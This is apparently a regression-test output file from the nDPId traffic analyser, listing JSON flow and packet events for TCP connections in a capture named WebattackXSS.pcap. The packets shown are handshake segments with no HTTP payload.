+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":437,"flow_packet_id":1,"flow_last_seen":1499347706399,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347706399,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8F3NAAD4Grl2sEAABwKgKMuqYAFBMGa4nAAAAAKACchC\/SgAAAgQFtAQCCAoBO7lUAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6182,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":437,"flow_packet_id":2,"flow_last_seen":1499347706399,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347706399,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6pjZqykETBmuKKAScSAuywAAAgQFtAQCCAoD5YrJATu5VAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6183,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":437,"flow_packet_id":3,"flow_last_seen":1499347706400,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347706400,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0F3RAAD4GrmSsEAABwKgKMuqYAFBMGa4o2aspBYAQAOXN0gAAAQEICgE7uVQD5YrJ"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6202,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347709252,"flow_last_seen":1499347709252,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709252,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60084,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6202,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":438,"flow_packet_id":1,"flow_last_seen":1499347709252,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347709252,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8u61AAD4GCiOsEAABwKgKMuq0AFAeNwewAAAAAKACchCQvwAAAgQFtAQCCAoBO7wdAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6203,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":438,"flow_packet_id":2,"flow_last_seen":1499347709253,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347709253,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6rSwITsWHjcHsaAScSAU7wAAAgQFtAQCCAoD5Y2SATu8HQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":438,"flow_packet_id":3,"flow_last_seen":1499347709253,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347709253,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0u65AAD4GCiqsEAABwKgKMuq0AFAeNwexsCE7F4AQAOWz9QAAAQEICgE7vB4D5Y2S"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347574366,"flow_last_seen":1499347579775,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58650,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347574366,"flow_last_seen":1499347579775,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58650,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347575652,"flow_last_seen":1499347580775,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58664,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347575652,"flow_last_seen":1499347580775,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347578164,"flow_last_seen":1499347583775,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58690,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347578164,"flow_last_seen":1499347583775,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58690,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347579405,"flow_last_seen":1499347584775,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58704,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347579405,"flow_last_seen":1499347584775,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58704,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347580693,"flow_last_seen":1499347585776,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58718,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347580693,"flow_last_seen":1499347585776,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58718,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347583209,"flow_last_seen":1499347588776,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58744,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347583209,"flow_last_seen":1499347588776,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58744,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347712277,"flow_last_seen":1499347712277,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347712277,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60134,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":439,"flow_packet_id":1,"flow_last_seen":1499347712277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347712277,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nw9AAD4GJsGsEAABwKgKMurmAFCpjSAeAAAAAKACchDp1AAAAgQFtAQCCAoBO78RAAAAAAEDAwc="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347712277,"flow_last_seen":1499347712277,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347712277,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":440,"flow_packet_id":1,"flow_last_seen":1499347712277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347712277,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81Z1AAD4G8DKsEAABwKgKMuroAFDnlWqMAAAAAKACchBhXAAAAgQFtAQCCAoBO78RAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6219,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":440,"flow_packet_id":2,"flow_last_seen":1499347712277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347712277,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6ui8Jpzg55VqjaAScSB0yAAAAgQFtAQCCAoD5ZCGATu\/EQEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6220,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":439,"flow_packet_id":2,"flow_last_seen":1499347712277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347712277,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6uYE2QpnqY0gH6AScSBHCAAAAgQFtAQCCAoD5ZCGATu\/EQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6221,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":440,"flow_packet_id":3,"flow_last_seen":1499347712277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347712277,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01Z5AAD4G8DmsEAABwKgKMuroAFDnlWqNvCac4YAQAOUTzwAAAQEICgE7vxID5ZCG"} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":439,"flow_packet_id":3,"flow_last_seen":1499347712277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347712277,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nxBAAD4GJsisEAABwKgKMurmAFCpjSAfBNkKaIAQAOXmDgAAAQEICgE7vxID5ZCG"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6229,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347713588,"flow_last_seen":1499347713588,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347713588,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60154,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6229,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":441,"flow_packet_id":1,"flow_last_seen":1499347713588,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347713588,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8P+JAAD4Ghe6sEAABwKgKMur6AFB3+v+7AAAAAKACchA6bgAAAgQFtAQCCAoBO8BZAAAAAAEDAwc="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6230,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":441,"flow_packet_id":2,"flow_last_seen":1499347713588,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347713588,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6vp4zY2Qd\/r\/vKAScSCfOwAAAgQFtAQCCAoD5ZHOATvAWQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":441,"flow_packet_id":3,"flow_last_seen":1499347713589,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347713589,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0P+NAAD4GhfWsEAABwKgKMur6AFB3+v+8eM2NkYAQAOU+QwAAAQEICgE7wFkD5ZHO"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6247,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347716243,"flow_last_seen":1499347716243,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347716243,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60180,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6247,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":442,"flow_packet_id":1,"flow_last_seen":1499347716243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347716243,"pkt":"ABm5CmnxAMGxFOsxCABFAAA821BAAD4G6n+sEAABwKgKMusUAFBsBhmhAAAAAKACchApywAAAgQFtAQCCAoBO8LxAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6248,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":442,"flow_packet_id":2,"flow_last_seen":1499347716243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347716243,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6xT1wuHkbAYZoqAScSC6tgAAAgQFtAQCCAoD5ZRmATvC8QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6249,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":442,"flow_packet_id":3,"flow_last_seen":1499347716244,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347716244,"pkt":"ABm5CmnxAMGxFOsxCABFAAA021FAAD4G6oasEAABwKgKMusUAFBsBhmi9cLh5YAQAOVZvgAAAQEICgE7wvED5ZRm"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6256,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347717533,"flow_last_seen":1499347717533,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347717533,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60194,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6256,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":443,"flow_packet_id":1,"flow_last_seen":1499347717533,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347717533,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GKhAAD4GrSisEAABwKgKMusiAFDZTNycAAAAAKACchD4NwAAAgQFtAQCCAoBO8Q0AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6257,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":443,"flow_packet_id":2,"flow_last_seen":1499347717533,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347717533,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6yL+myOL2UzcnaAScSA9YgAAAgQFtAQCCAoD5ZWoATvENAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6258,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":443,"flow_packet_id":3,"flow_last_seen":1499347717534,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347717534,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GKlAAD4GrS+sEAABwKgKMusiAFDZTNyd\/psjjIAQAOXcaQAAAQEICgE7xDQD5ZWo"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6280,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347720094,"flow_last_seen":1499347720094,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720094,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6280,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":444,"flow_packet_id":1,"flow_last_seen":1499347720094,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347720094,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qt5AAD4GGvKsEAABwKgKMus8AFAqiGxqAAAAAKACchAUlQAAAgQFtAQCCAoBO8a0AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6281,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":444,"flow_packet_id":2,"flow_last_seen":1499347720095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347720095,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6zwJv9VKKohsa6AScSCaWwAAAgQFtAQCCAoD5ZgpATvGtAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6282,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":444,"flow_packet_id":3,"flow_last_seen":1499347720095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347720095,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0qt9AAD4GGvmsEAABwKgKMus8AFAqiGxrCb\/VS4AQAOU5YwAAAQEICgE7xrQD5Zgp"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347584472,"flow_last_seen":1499347589778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58758,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347584472,"flow_last_seen":1499347589778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347585744,"flow_last_seen":1499347590777,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58772,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 